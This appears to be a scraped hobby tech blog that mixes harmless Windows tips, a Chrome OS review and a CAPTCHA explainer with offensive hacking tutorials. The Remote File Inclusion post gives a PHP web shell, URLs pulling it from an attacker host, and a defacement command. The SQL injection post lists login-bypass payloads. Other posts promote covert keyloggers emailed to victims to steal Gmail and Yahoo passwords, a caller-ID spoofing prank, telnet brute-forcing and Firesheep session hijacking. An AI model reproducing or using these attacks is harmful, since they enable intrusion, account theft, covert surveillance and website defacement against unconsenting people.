Wednesday

TIMER FOR COMPUTERS

There are times when one needs to schedule a shutdown of the computer after a predefined interval of time. Maybe you are running a virus scan or downloading something from the internet. Although some programs have an options for auto-shutdown after performing their tasks, many others don’t.
Scheduled Shutdown is very simple Java application that lets us shutdown our computer after a specified interval of time. With Scheduled Shutdown – we can shutdown our computer from a period of 1 minute to – 12 hours
Scheduled Shutdown is a small (~1 Mb) freeware software. Once you install it you can access it via the start menu. The program has just a single window where you can set the shutdown interval.
When you set the interval you would get a notice about the shutdown interval in system tray.
Once you have set the shutdown the “Cancel” button is highlighted – You can click on it to cancel the shutdown timer.
if you cancel the shutdown schedule – you would be notified in the system tray.
As we can see above – Scheduled Shutdown is a very easy to use app and quite useful when you need a small program that would shut down or restart the computer after pre-defined interval.

download frm the link below:

http://sourceforge.net/projects/schedulshutdown/files/


ANOTHER WAY TO DEVELOP A TIMER BY YOURSELF (no software needed):


its quite simple to make a sheduled shutdown timer for your pc all by your self using nothing but noted.
Here goes the trick....
1)Open notepad:
write the following there ,exactly :


shutdown -s -t time (in time give the time after which you wish your pc to get shutdown ,but mention the time in seconds..... example: shutdown -s -t 3600 if you wish to shutdown your pc after 1 hour)


2)then save the notepad with any name but with .bat extension (example :timer.bat)


now your timer is ready, whenever you need this timer ,just double click on this .bat file you have made and your timer will start, and your pc will shutdown after the specified time.

Tuesday

GODMODE IN WINDOWS 7



How to Use God Mode in Windows 7

Windows 7 is now becoming popular among windows operating system users.Windows 7 has cool hidden feature ,people calls it godmode in windows 7.GodMode is a folder that brings together a long list of customization settings allowing you to change all your settings from one place.This is very good as you can now change all your windows settings from one single place.

Follow the following steps to create god mode folder:

1. Create a new folder

2. Rename the folder to GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

You can change word GodMode to any other word you like your name or your friends name

3.The folder icon will change ,then double click it to show the GodMode windows options.

Monday

COOL FACEBOOK APPS

AUTOMATED BIRTHDAY WISHER IN FACEBOOK

RECENTLY I DISCOVERED A COOL FACEBOOK APPLICATION THANX TO A SENIOR OF MY COLLEGE. THE APPLICATION WAS SPECIAL ,IT AUTOMATICALLY WISHES YOUR FRIENDS ON THEIR BIRTHDAY BY POSTING "THE BIRTHDAY MESSAGE" ON YOUR BEHALF IN YOUR FRIENDS WALL, THAT IS EVEN IF YOU HAVE FORGOT YOUR FRIENDS BIRTHDAY, BUT THIS APPLICATION REMEMBERS IT AND WISHES YOUR FRIEND ON YOUR BEHALF ,IS IT NOT COOL. AT TIMES YOU MIGHT BE BUSY AND MAY NOT HAVE THE TIME TO DO FACEBOOK , EVEN THEN THIS APPLICATION WILL WISH YOUR FRIEND ON YOUR BEHALF.....CHECK OUT THIS COOL APPLICATION CALLED "AUTOBUDDER "
CLICK THE LINK BELOW TO GO TO THE APPLICATION :

http://www.facebook.com/autobudder

NEW GOOGLE OPERATING SYSTEM



What if nearly everything you usually keep on your computer — photos, documents, music and software — was stored online? Your machine would be speedier and perhaps less vital because you could simply use another machine to recoup your digital life should you lose your laptop.

This premise — somewhat scary, yet liberating — is behind Google Inc.'s upcoming Chrome OS, which will make notebook computers more like netbooks than most actual netbooks.

The software powering Chrome OS, which is based on the search giant's eponymously named browser, serves mainly as a tool for connecting your computer to the Web. That's where nearly everything you use is housed and linked to your Google username and password. It's a concept known as cloud computing.

A peek at the upcoming operating system and its vision of cloud computing shows a promising idea that could make computing faster and more convenient. But it still needs a lot of work.

Google expects the first computers powered by Chrome OS to be released this summer, and initially they'll be made by Acer Inc. and Samsung Electronics Co.

For now, though, Google is operating a pilot for some individuals and companies to test an unbranded laptop that runs Chrome OS. The company lent The Associated Press one of these machines, which aren't going to be sold to the public.

The laptop itself, called the Cr-48, doesn't really deserve to be critiqued, because it is a stripped-down machine that is chiefly a frame for Google's OS oeuvre. The shell is entirely matte black plastic, without a hint of branding. It has a webcam, a screen that is about 12 inches diagonally and a full-sized keyboard with a search key in place of the caps lock key.

The machine also has 16 gigabytes of flash memory for storing files, if you feel absolutely compelled to download something. Downloads are obviously discouraged, though; my music collection alone would nearly fill this allotment.

Moving on to the main event, Chrome OS brings a few clear benefits: Starting up the notebook takes just seconds — roughly 13 of them, according to my stopwatch — and waking the closed notebook from "sleep" mode is as quick as opening it up (almost too quick, as the notebook couldn't regain its wireless service quite as fast). By contrast, my Windows machine at work takes more than two minutes to boot up.

After you sign in with your Google account, the same username and password you would use to access Gmail, you can pull up a home page showing all the apps you've installed from the Chrome Web Store. Assuming you're connected to the Web, you can just start using apps and surfing the Web right away.

There were plenty of free and paid Web apps and browser extensions available when I tested the notebook. Some are only for the Chrome OS; others also work with Google's Chrome Web browser for other computers.

I installed a range of the free ones, some of which seemed to be just links to existing Web pages. The apps I snagged included Web-based office suite Google Docs, the chatting service Google Talk, Aviary's Advanced Image Editor and balloon-popping puzzle game Poppit.

As with smart phones and tablets such as Apple Inc.'s iPad, publications are also making Chrome apps. USA Today, The New York Times and The Wall Street Journal are among them.

On my work computer, it can take ages to open up applications that are stored on my hard drive. With the Cr-48, I could immediately start editing a Google Docs spreadsheet or tweak the colors in a photo using Aviary because the programs are all running online. I only needed a strong Internet connection.

Surfing the Web was a pretty normal experience, with most websites loading speedily, though the Cr-48 was not that good at displaying Flash videos.

But I felt constrained because I had to use the lone browser that comes with the system and the Web-based apps I obtained. Apps loaded slowly when my Internet connection wasn't stellar. This wouldn't be a problem with programs stored on a regular computer's hard drive.

If a Chrome OS-based laptop becomes my primary computer, a data plan would be a must.

I feel anxious just thinking about the possibility that I couldn't access my documents at any time, and I don't even keep anything that important on my own laptop.

I mostly used the notebook with Wi-Fi at home and at the office, though I also tried out its 3G network service, which is provide by Verizon Wireless.

So what happens if you don't have any Internet access? The Cr-48 is pretty useless.

I could still write in an already-open Google Docs document, add notes in Scratchpad and look at photos I'd downloaded. But I couldn't use apps that are not yet opened because they're all connected to the Web.

If you lose your connection while using an app, you may be able to view some information that has been temporarily stored in memory, as I could when browsing The New York Times' app. But you'll need to get online as soon as possible to really use the machine. Faced with this situation, I'd probably just search frantically for an Internet connection or simply put away my laptop.

In its current state, the Chrome OS is far from ready to take over as my main computer, even if I were using it on a more powerful machine than the Cr-48.





more info plz visit ....
http://en.wikipedia.org/wiki/Google_Chrome_OS

Sunday

What is CAPTCHA and How Does it Work?

CAPTCHA or Captcha (pronounced as cap-ch-uh) which stands for “Completely Automated Public Turing test to tell Computers and Humans Apart” is a type of challenge-response test to ensure that the response is only generated by humans and not by a computer. In simple words, CAPTCHA is the word verification test that you will come across the end of a sign-up form while signing up for Gmail or Yahoo account. The following image shows the typical samples of CAPTCHA.

Almost every Internet user will have an experience of CAPTCHA in their daily Internet usage, but only a few are aware of what it is and why they are used. So in this post you will find a detailed information on how CAPTCHA works and why they are used.




What Purpose does CAPTCHA Exactly Serve?

CAPTCPA is mainly used to prevent automated software (bots) from performing actions on behalf of actual humans. For example while signing up for a new email account, you will come across a CAPTCHA at the end of the sign-up form so as to ensure that the form is filled out only by a legitimate human and not by any of the automated software or a computer bot. The main goal of CAPTCHA is to put forth a test which is simple and straight forward for any human to answer but for a computer, it is almost impossible to solve.

What is the Need to Create a Test that Can Tell Computers and Humans Apart?

For many the CAPTCHA may seem to be silly and annoying, but in fact it has the ability to protect systems from malicious attacks where people try to game the system. Attackers can make use of automated softwares to generate a huge quantity of requests thereby causing a high load on the target server which would degrade the quality of service of a given system, whether due to abuse or resource expenditure. This can affect millions of legitimate users and their requests. CAPTCHAs can be deployed to protect systems that are vulnerable to email spam, such as the services from Gmail, Yahoo and Hotmail.

Who Uses CAPTCHA?

CAPTCHAs are mainly used by websites that offer services like online polls and registration forms. For example, Web-based email services like Gmail, Yahoo and Hotmail offer free email accounts for their users. However upon each sign-up process, CAPTCHAs are used to prevent spammers from using a bot to generate hundreds of spam mail accounts.

Designing a CAPTCHA System

CAPTCHAs are designed on the fact that computers lack the ability that human beings have when it comes to processing visual data. It is more easily possible for humans to look at an image and pick out the patterns than a computer. This is because computers lack the real intelligence that humans have by default. CAPTCHAs are implemented by presenting users with an image which contains distorted or randomly stretched characters which only humans should be able to identify. Sometimes characters are striked out or presented with a noisy background to make it even more harder for computers to figure out the patterns.
Most, but not all, CAPTCHAs rely on a visual test. Some Websites implement a totally different CAPTCHA system to tell humans and computers apart. For example, a user is presented with 4 images in which 3 contains picture of animals and one contain a flower. The user is asked to select only those images which contain animals in them. This Turing test can easily be solved by any human, but almost impossible for a computer.

Breaking the CAPTCHA

The challenge in breaking the CAPTCHA lies in real hard task of teaching a computer how to process information in a way similar to how humans think. Algorithms with artificial intelligence (AI) will have to be designed in order to make the computer think like humans when it comes to recognizing the patterns in images. However there is no universal algorithm that could pass through and break any CAPTCHA system and hence each CAPTCHA algorithm must have to be tackled individually. It might not work 100 percent of the time, but it can work often enough to be worthwhile to spammers.

Saturday

How not to get Hacked – Choosing the Right Password

Its a digital nightmare when your password gets hacked. Password compromise = your are fucked, straight away. And if you do happen to be at an important position in a firm, and unfortunately find yourself the root cause of company’s security problems, its time to learn a few basics of choosing the right password. Be it your Email ID, terminal login, voicemail or anything that uses a generic password protection system,you need to choose a secure password for your digital ventures. Nevertheless, this simple guide is applicable to every netizen online who wants to secure himself by choosing the right password. Cause in the end, its your password that makes it easy, or hard for attackers to gain access to your account.




About Bad Passwords
Poor weak passwords have the following characteristics (if you have even one,make sure to change it) -
Password size less than 15 characters
Password is a word from dictionary
The password is -
Name of family,pet,your favorite videogame character.
Computer terms,commands,website name,hardware,software etc.
Personal data like birthday,mobile phone numbers, address etc.
Any of the above spelled backwards! or succeeded or preceded by a number or letter (password1, 1 password)
In short any form of personal stupidity leads to tragic events :P
How to get hacked ?
Reveal your password to any one.
Reveal it in an email message,phone call,to your boss, give hints to others,share it with friends and co workers.
Write it down somewhere.
Keep same passwords for all your digital ventures, like emails, voicemails etc
NEVER CHANGE IT.

In any case, if you want the opposite, follow the opposite :)
Making a STRONG Password
use phrases to form passwords, these are much secure to form and hard to guess.
for eg, the phrase -
“ This is a super secure password and is hard to hack :P ”
will form a password given below by taking the first letter and substituting similar sounding words with numbers. See..its quite hard to hack :)
“ Tiassp&ih2h:P ”
Use numbers, letters, uppercase and lowercase and mix them freely to form you password. make sure its not a dictionary word and DOES NOT CONTAIN any characteristic of weak passwords stated earlier.
A more secure version is to use passphrases to form passwords. A passphrase is a longer version of password and hence its more secure. Make sure its easy to remember,not a famous quotation and hard to guess by intuition
As Clifford Stoll says,
“ Treat your password like your toothbrush. Don't let anybody else use it, and get a new one every six months “
He is damn right..just make sure you change it every month or more often to be secure.
I guess you will now be able to form secure passwords and deploy them fully.

Mousezahn - Open source free fast traffic generator and packet crafter tooll

Mausezahn is a free fast traffic generator written in C which allows you to send nearly every possible and impossible packet. It is mainly used to test VoIP or multicast networks but also for security audits to check whether your systems are hardened enough for specific attacks.
Mausezahn can be used for example:




As traffic generator (e. g. to stress multicast networks)
To precisely measure jitter (delay variations) between two hosts (e. g. for VoIP-SLA verification)
As didactical tool during a datacom lecture or for lab exercises
For penetration testing of firewalls and IDS
For DoS attacks on networks (for audit purposes of course)
To find bugs in network software or appliances
For reconnaissance attacks using ping sweeps and port scans
To test network behavior under strange circumstances (stress test, malformed packets)
Mausezahn is basically a versatile packet creation tool on the command line with a simple syntax and context help. It could also be used within (bash-) scripts to perform combination of tests. By the way, Mausezahn is quite fast; when started on my old PIII-Laptop (1.4 GHz, Gigabit Ethernet) I measured 755 Mbit/s using the interface packet counters of an HP ProCurve 5400 switch.
Currently Mausezahn is only available for Linux platforms. Please do NOT PORT Mausezahn to Windows!


Yoiu can download Mausezahn here:
mz-0.40.tar.gz

Friday

A simple tutorial on Remote File Inclusion (RFI)

RFI stands for Remote File Inclusion, and it allows the attacker to upload a
custom coded/malicious file on a website or server using a script. The vulnerability exploit the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using javascript). This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of tutorial, i suppose you will know what it is all about and may be able to deploy an attack or two.




RFI is a common vulnerability, and trust me all website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and do almost anything (including gagging them out or beg..well that's an exaggeration but I guess you get the idea :P ) . What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one, some BASH might come handy as most of servers today are hosted on Linux..
Okay..Lets start..The first step is to find vulnerable site..you can easily find them using Google dorks..If you don't have any idea, you might want to read about advanced password hacking using Google dorks or to use automated tool to apply Google dorks using Google. Now lets assume we have found a vulnerable website
http://victimsite.com/index.php?page=home
As you can see, this website pulls documents stored in text format from server and renders them as web pages. We can find ways around it as it uses PHP include function to pull them out..check it out.
http://victimsite.com/index.php?page=http://hackersite.com/evilscript.txt
I have included a custom script “eveilscript” in text format from my website, which contains some code..Now..if its a vulnerable website, then 3 cases happen -
Case 1 - You might have noticed that the url consisted of “”page=home” had no extension, but I have included an extension in my url,hence the site may give an error like “failure to include evilscript.txt.txt”, this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
Case 2 - In case, it automatically appends something in the lines of .php then we have to use a null byte “” in order to avoid error.
Case 3 – successfull execution :)
Now once you have battled around this one, you might want to learn what to code inside the script. You may get a custom coded infamous C99 script (too bloaty but highly effective once deployed) or you might code yourself a new one. For this knowledge of PHP might come in handy. Here we go

echo "";
echo "Run command: ".htmlspecialchars($_GET['cmd']);
system($_GET['cmd']);

?>
The above code allows you to exploit include function and tests if the site if RFI (XSS) vulnerable by running the alert box code and if successful, you can send custom commands to the linux server in bash. So…If you are in luck and if it worked, lets try our hands on some Linux commands. For example to find the current working directory of server and then to list files, we will be using “pwd” and “ls” commands.

http//victimsite.com/index.php?cmd=pwd&page=http://hackersite.com/ourscript
http//victimsite.com/index.php?cmd=ls&page=http://hackersite.com/ourscript
What it does is that it sends the command as cmd we put in our script, and begins print the working directory and list the documents..Even better..you can almost make the page proclaim that you hacked it by using the “echo” command..

cmd=echo U r pwn3d by xero> index.php
It will then re-write the index.php and render it..In case,its a primitive website which stores pages with .txt extension, you might want to put it with along the .txt files.Now..as expected..We are now the alpha and the omega of the website :) we can download, remove, rename, anything! Want to download stuff ? try the “wget” function (cmd=wget.. get the idea..)..Want to move it out ? “mv”..
I leave the rest on your creativity..

GNS 3 Tutorial – Basic Router password Configuration

Hi folks..I have started my first steps into Cisco, & would be sharing my small experiments in it. Actually , this time I am covering the basics using GNS3 which is a powerful open source network simulator to simulate a simple topology of 2 routers with their basic configuration & commands. I assume you have worked with GNS3 or atleast know how to load IOS & make a simple topology..
So, firstly download GNS3 & install it. Get IOS images from and load them (if you are really not sure of this step, mail me, I will expand the basics more)
The topology I created is this -

2 routers connected via gigabit . What we will be doing is -
Set router password.
Set telnet password
Set Console Password
Encrypt All passwords.
Set Ip Address of routers.
Anyways, I start by right clicking on R2 router.
Connected to Dynamips VM "R2" (ID 7, type c7200) - Console port
To get into privilege mode, type this command.
R2>en
To configure router, type this command ..
R2#conf t
Enter configuration commands, one per line. End with CNTL/Z.
To set router password & encrypt all passwords type these commands
R2(config)#enable secret router2
R2(config)#service pass
R2(config)#service password-encryption
Now to set console & its password type these commands
R2(config)#line console 0
R2(config-line)#password console
R2(config-line)#login
R2(config-line)#exit
Now to set telnet (vty/virtual terminal) & its password type these commands
R2(config)#line vty 0 4
R2(config-line)#password telnet
R2(config-line)#login
R2(config-line)#exit
Once done, you can now configure the interface by typing these commands
R2(config)#int g1/0
R2(config-if)#desc ROUTER LAN 2 GIGABIT INTERFACE
R2(config-if)#ip address 192.168.1.20 255.255.255.0
R2(config-if)#no shut
R2(config-if)#
*Feb 19 19:56:42.035: %LINK-3-UPDOWN: Interface GigabitEthernet1/0, changed state to up
R2(config-if)#
*Feb 19 19:56:42.035: %ENTITY_ALARM-6-INFO: CLEAR INFO Gi1/0 Physical Port Administrative State Down
*Feb 19 19:56:43.035: %LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet1/0, changed state to up
R2(config-if)#end
*Feb 19 19:56:47.723: %SYS-5-CONFIG_I: Configured from console by console
R2#
Once done, you can see the configuration by typing -
R2#show running-config
Building configuration...
Current configuration : 932 bytes
!
upgrade fpd auto
version 12.4
service timestamps debug datetime msec
service timestamps log datetime msec
service password-encryption
!
hostname R2
!
boot-start-marker
boot-end-marker
!
enable secret 5 $1$trNZ$uNTgBIA1QG43/4YEB29lf/
!
no aaa new-model
ip cef
!
!
!
!
no ip domain lookup
!
multilink bundle-name authenticated
!
!
!
archive
log config
hidekeys
!
!
interface FastEthernet0/0
no ip address
shutdown
duplex half
!
interface GigabitEthernet1/0
description ROUTER LAN 2 GIGABIT INTERFACE
ip address 192.168.1.20 255.255.255.0
negotiation auto
!
no ip http server
no ip http secure-server
!
!
!
logging alarm informational
!
!
control-plane
!
!
gatekeeper
shutdown
!
!
line con 0
exec-timeout 0 0
password 7 070C2E425D061500
logging synchronous
login
stopbits 1
line aux 0
stopbits 1
line vty 0 4
password 7 06120A2D424B1D
login
!
!
webvpn cef
!
end
R2#
If done properly, it will look like more or less the same I have pasted above. Also, as you can see, all the passwords are encrypted. In the similar way you can configure Router 1. Make a note os passwords, I have kept quite simple passwords just to demonstrate the configuration. Please keep secure passwords ,

Thursday

Activate Google Adsense Via Indyarocks.com

You guys know that Google Adsense earn More revenue to Your blog, but you wont get an Adsense account easily. You have to wait at least 6 months (or 1 month if your content is good), You need good traffic, and You must not violate Adsense terms and conditions.



Now You can easily activate Adsense with indyarocks.com

Link to create account yo indyarocks.com
http://www.indyarocks.com/register_step1.php?affliate=NjEyMTIzOQ==
For that You need to satisfy 4 conditions

1). 80% of your profile must be completed,

2). upload 10 pictures to Your indyarocks album

3). write 2 post about your blog in indyarocks.

4).Upload Profile Picture

Now,
You are Eligible and apply for adsense via Indyarocks
Please Spread This to Your Friends Who Needs an Adsense Account. This is A Best Opportunity For them, There is Nothing Wrong by Trying.

How to Use Mobile Camera As Webcam



Now A days everybody owns a mobile phone with camera.And it is really interesting and simple to use your mobile phone camera as webcam for your yahoo,gtalk or any other messenger.So if you dont have a webcam and doesnot want to waste money on buying a new one then this is the best solution for you.For using your mobile camera as a webcam you need to have a symbian mobile phone or a windows mobile phone as the application that we will be using only works on the symbian or windows platform.This application is free to download and use.Moreover,It is an open source project .



The Download Link For this application Is given below

http://handheld.softpedia.com/get/Internet-Utilities/SmartCam-40130.shtml

1.Install it in both your computer and mobile phone.

2.Bluetooth in your mobile and computer.

First download and install the windows file in your computer and then mobile file in your mobile phone.Now connect both the devices using bluetooth.

Now you can use your mobile phone camera as a webcam.

Here is the list of nokia phones that it might support

5320 XpressMusic

6210 Navigator

6220 classic

6650

N78

N96

= = = = = = = =

** S60 3rd Edition, Feature Pack 1 **

(OS v9.2)

5700 XpressMusic

6110 Navigator

6120 classic

6121 classic

6124 classic

6290

E71 (320×240)

E66

E51

E90 Communicator (800×352)

N76

N81

N81 8GB

N82

N95

N95 8GB

N95-3 NAM

= = = = = = = =

** S60 3rd Edition (initial release) **

(OS v9.1)

3250 (176×208)

5500 Sport (208×208)

Wednesday

nvite people by email to Google Plus?

Google just launched its Google Plus. And it’s invite-only. But people aren’t exactly killing each for Google Plus invites.
how to send google+ req????



follow these steps for sending the request in google +
1) your friend whom you want to send friend request in google+ he/she must have gmail account.
2) login your gmail account and open google+ and goto the circle
3) type your friends name in search box then it will show you your friend in google+ serch result.
4) just drag your friend in circle then click on invite (your friend name) to google+ and click on invite.
5)The google+'s invitation's email sent in your friend's gmail box now open that and singup in google +

Note, I’ve been informed by a Googler+ that invites are rate limited by hour. So if they can’t click through that first time, they can try again later with same link. (You don’t need to resend it)

How to install FireSheep on Linux

What is FireSheep ?

Come on damn.. Its not new! :-D Its an old firefox addon. I am explaining it here for how can you use or install it on Linux.

Lets start ;

Taking Checkout from the repository :

git clone https://github.com/codebutler/firesheep.git

Output :

Initialized empty Git repository in /root/firesheep/.git/
remote: Counting objects: 1020, done.
remote: Compressing objects: 100% (605/605), done.
remote: Total 1020 (delta 589), reused 770 (delta 402)
Receiving objects: 100% (1020/1020), 5.48 MiB | 123 KiB/s, done.
Resolving deltas: 100% (589/589), done.

cd firesheep/
git submodule update --init

Output :

Output :Submodule ‘backend/deps/http-parser’ (git://github.com/ry/http-parser.git) registered for path ‘backend/deps/http-parser’
Initialized empty Git repository in /root/firesheep/backend/deps/http-parser/.git/
remote: Counting objects: 815, done.
remote: Compressing objects: 100% (328/328), done.
remote: Total 815 (delta 549), reused 735 (delta 483)
Receiving objects: 100% (815/815), 185.18 KiB | 95 KiB/s, done.
Resolving deltas: 100% (549/549), done.
Submodule path ‘backend/deps/http-parser’: checked out ’459507f534c807d8ba741730fbc36d4b93b133c1′

Dependencies :

apt-get install libpcap-dev xulrunner-1.9.2-dev libboost-all-dev libtool libhal-dev autoconf

Compilation :

./autogen.sh
make

DONE!

How to Load it into Firefox?

firefox build/firesheep.xpi

HOW TO : Call Your Friends From Their Own Cell Number

1. Go to the http://www.mobivox.com and register thereto make an account.

2. During registration, insert the mobile number of the victim with whom you wanna play this trick in "Phone number" field

3. Finish the registration process, confirm your email id and then login to your account. Now, click on the "Direct WebCall" option as shown in the image below.



4. You will arrive at page shown below. In "Enter a number" box, select your country and also mobile number of your victim friend. Now, just click on the "Call Now" button to call your friend .



5. Now, you friend will get a call from his/her own number... Enjoy

Tuesday

How to hack website using sql injection

what is sql injection?

SQL Injections or simply called Structured Query Language Injection is a technique that exploits the loop hole in the database layer of the application. This happens when user mistakenly or purposely(hackers) enters the special escape characters into the username password authentication form or in URL of the website. Its called the coding standard loop hole. some website owners doesn't have proper knowledge of secure coding standards and that results into the vulnerable websites. Now assume , you opened a website and went to his Sign in or log in page. Now in username field you have entered something say yogesh and in the password box you pass some escape characters like ',",1=1, etc... Now if the website owner hasn't handled null character strings or escape characters then user will surely get something else that owner never want their users to view.. This is basically called Blind SQL.

Some basic requirements for sql injection:
1) you need a web browser to open URL and to view source codes.
2) you need notepad++.
3) and very basic queries of sql like insert , select , update , delete etc.

First of all you can hack those website using SQL injection hacks that allows some input fields from the visitor which can provide input to website like log in page , search page, feedback page etc.
Now a days , HTML pages use POST command to send parameter to another ASP/ASPX page.
Therefore, you may not see the parameter in the URL. You can check the source code of the HTML, and look for "FROM" tag in the HTML code. You may find something like this in some HTML codes:



< / F O R M>


Everything between the < F O R M > and < / F O R M > parameters(remove space in words) contains the crucial information and can help us to determine things in more detailed way.



There is alternate method for finding vulnerable website, the websites which have extension ASP, ASPX, JSP, CGI or PHP try to look for the URL's in which parameters are passed. Example is shown below:


http://example.com/login.asp?id=10



Now how to detect that this URL is vulnerable or not:
Start with single quote trick, take sample parameter as hi'or1=1--. Now in the above URL id is the parameter and 10 is its value. So when we pass hi'or1=1-- as parameter the URL will look like this:

http://example.com/login.asp?id=hi' or 1=1--




You can also do this with hidden field, for that you need to save the webpage and had to made changes to URL and parameters field and modify it accordingly. For example:
< F O R M action=http://example.com/login. asp method=p o s t >
< i n p u t type=hidden name=abc value="hi' or 1=1--">
< / F O R M >

If your luck is favoring you, you will get the login into the website without any username or password.


But why ' or 1=1-- ?
Take an asp page that will link you to another page with the following URL:

http://example.com/search.asp?category=sports
In this URL 'category' is the variable name and 'sports' is it's value.

Here this request fires following query on the database in background.
SELECT * FROM TABLE-NAME WHERE category='sports'
Where 'TABLE-NAME' is the name of table which is already present in some database.
So, this query returns all the possible entries from table 'search' which comes under the category 'sports'.

Now, assume that we change the URL into something like this:
http://example.com/search.asp?category=sports' or 1=1--

Now, our variable 'category' equals to "sports' or 1=1-- ", which fires SQL query on database something like: SELECT * FROM search WHERE category='sports' or 1=1--'

The query should now select everything from the 'search' table regardless if category is equal to 'sports' or not.
A double dash "--" tell MS SQL server to ignore the rest of the query, which will get rid of the last hanging single quote (').
Sometimes, it may be possible to replace double dash with single hash "#".

However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try

' or 'a'='a

It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
'or''='

What is hacking ?

Hacking is unauthorized use of computer and network resources.
The term "hacker" originally meant a very gifted programmer. In recent years though, with easier access to multiple systems, it now has negative implications.



We work with IBM Consulting and its customers to design and execute thorough evaluations of their computer and network security. Depending on the evaluation they request (ranging from Web server probes to all-out attacks), we gather as much information as we can about the target from publicly available sources. As we learn more about the target, its subsidiaries and network connectivity, we begin to probe for weaknesses.

Examples of weaknesses include poor configuration of Web servers, poor web hosting, old or unpatched software, disabled security controls, and poorly chosen or default passwords. As we find and exploit vulnerabilities, we document if and how we gained access, as well as if anyone at the organization noticed. In nearly all the cases, the Information Syhstems department is not informed of these planned attacks. Then we work with the customer to address the issues we've discovered.

The number of hackers in the world is very small, but there are lots of wannabes. When we do an ethical hack, we could be holding the keys to that company once we gain access. It's too great a risk for our customers to be put in a compromising position.

Monday

How to Hack Gmail Passwords

“How to hack Gmail passwords” or “Hack Gmail account” will yield 10s of thousands of results if not more, the question is, how do you sort through this entire maze? This is where this article comes in, I will give you review on how Gmail hacking is actually done and how you can do it on your own.
There are two main ways via witch you can hack into accounts:



Method #1 : hack via keylogger
You need to install keylogger in your computer and it will secretly record all keystrokes typed on your keyboard, this will allow you for example if you share a computer with your loved one; after they login into their account; to see the password they typed.
A great and easy to setup keylogger with a free trial can be found at http://www.hackemailpasswords.com .
Method #2 Use free software to hack gmail account
This method works by using some of the free software available out there (at least for now it’s free), one such site can be found at:
http://www.gmailhackerpro.com
how its work????
They exploit vulnerability in the Gmail database that allows them to hack and retrieve any Gmail account password within a very short amount of time, usually less than 3 minutes per account when using their software.

How to Hack a Yahoo Password

Is it possible to hack Yahoo?
Yes! As a matter of fact, it is possible to hack almost any email password.
1. Never trust any hacking service that claims to hack Yahoo password for just $100 or $200. In most cases they will rip off your pockets with false promises. Sometimes they may even start to threaten you by blackmailing that they are going to inform the victim or the cyber crime officials about your hack attempt. So, to be on the safer side, it is better to stay away from such scam websites.
2. Beware! On many websites and web portals you will often come across a fake tutorial on email hacking. The tutorial will tell you something like “You need to send the target email address along with your username and password to yahoo_pass_reset@yahoo.com (or similar)” to hack the password of the target account. This method seems too good to be true but, if you follow this method, you will lose your own password in attempt to hack someone else’s password.
there are only TWO ways to hack Yahoo password. They are keylogging and phishing.
1. KEYLOGGING: EASIEST WAY TO HACK YAHOO PASSWORD

A keylogger is a small program that records each and every keystroke (including passwords) that a user types on a specific computer’s keyboard. A keylogger is also called as spy program or spy software. To use it, you don’t need to have any special knowledge. Anyone with a basic knowledge of computer should be able to install and use this software. With my experience, I recommend the following two keyloggers as the best for hacking Yahoo password.
1. SniperSpy (Tested)
2. WinSpy (Tested)
I don’t have physical access to the target computer, can I still use SniperSpy?
Yes, you can! Since both SniperSpy and WinSpy offers Remote Installation Feature, it is possible to remotely install the keylogger on the target computer. However, it will also work on a local computer.
How to use SniperSpy?
1. After you download it, you will be able to create the installation module. You need to email this module to the remote user as an attachment.
2. When the remote user runs the module, it will get installed silently and the monitoring process will begin. The keystrokes are captured and uploaded to the SniperSpy servers continuously.
3. You can login to your online SniperSpy account (you get this after purchase) to see the logs which contains the password.
NOTE: If you have physical access to the target computer, you can simply install the module by yourself without the need to email it as an attachment.
The working of Winspy is somewhat similar to that of SniperSpy.
Once I install SniperSpy, can the victim come to know about it’s presence?
No. The victim will not come to know about it’s presence on his/her computer. This is because, after the installation, SniperSpy will run in a total stealth mode. Unlike other spy programs, it will never show up in start-menu, start-up, program files, add/remove programs or task manager.
Can I be traced back if I install it on some other computer?
No, it’s almost impossible to trace back to you for installing the keylogger on other’s computer.
How safe is to use SniperSpy?
Sniperspy is completely safe to use since all the customer databases remain confidential and private. SniperSpy will neither collect any information from your system nor will contact you in any way unless you request assistance.
What are the other features of SniperSpy software?
1. With SniperSpy, you can gain access to any password protected account including Yahoo, Gmail, Hotmail, MySpace, Facebook etc.
2. This software will not only capture passwords, but will also take screenshots and record chat conversations.
3. This product is extremely easy to use so that, even novice users can install and use it with ease.

Click Here to Download SniperSpy for Windows

http://www.gohacking.com/recom_products/SniperSpy_BN.php

Sunday

How to hack ip address?

Now follow these steps to hack ip address.
Confirm the website or a computer you want to hack.
Find or trace their IP address.
Make sure that IP address is online (online is necessary)
Scan for open ports
Check for venerable ports
access through the port
Brute-force username and password
First, getting the IP address of victim.
To get the IP address of the victim website, ping for it in command prompt.
For example,
ping www.google.com
will fetch the IP address of Google.com



This is how we can get the IP address of the victims website
Now you got the IP address right? Is it online? To know the online status just ping the IP address, if it is online it will reply.
If the IP address is online, scan for the open ports. Open ports are like closed door without locks, you can go inside and outside easily.
Use Advanced Port Scanner to scan all open and venerable ports.



Now you’ve IP address and open port address of the victim, you can now use telnet to try to access them. Make sure that you’ve telnet enabled in your computer or install it from Control panel > Add remove programs > add windows components.
Now open command prompt and use telnet command to access to the IP address. Use following syntax for connection.
telnet [IP address] [Port]



You’ll be asked to input login information.



If you can guess the informations easily then it’s OK. Or you can use some brute-forcing tools like this one.
In this way you’ll able to hack remove computer using only IP address.

How to disable”Turn Off Computer”button in XP?



You can disable the “Turn off Computer” button on the start menu and a common user will not “Turn Off, Restart and Stand By” a computer. Using registry editor, you can implement this task in all windows XP versions with minimum effort.
Follow the given steps to disable Turn off Computer” button on the start menu:
To use this feature, you will need to be logged into your computer with administrative rights.
Click Start button and type regedit in Run option then press Enter for next.



Here locate the location to:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
Here in right side panel, right click to create a new DWORD value with the name NoClose.

Now assign number 1 in value data box and close the registry editor.


Now close the registry editor and restart your computer after any changes to go into effect.
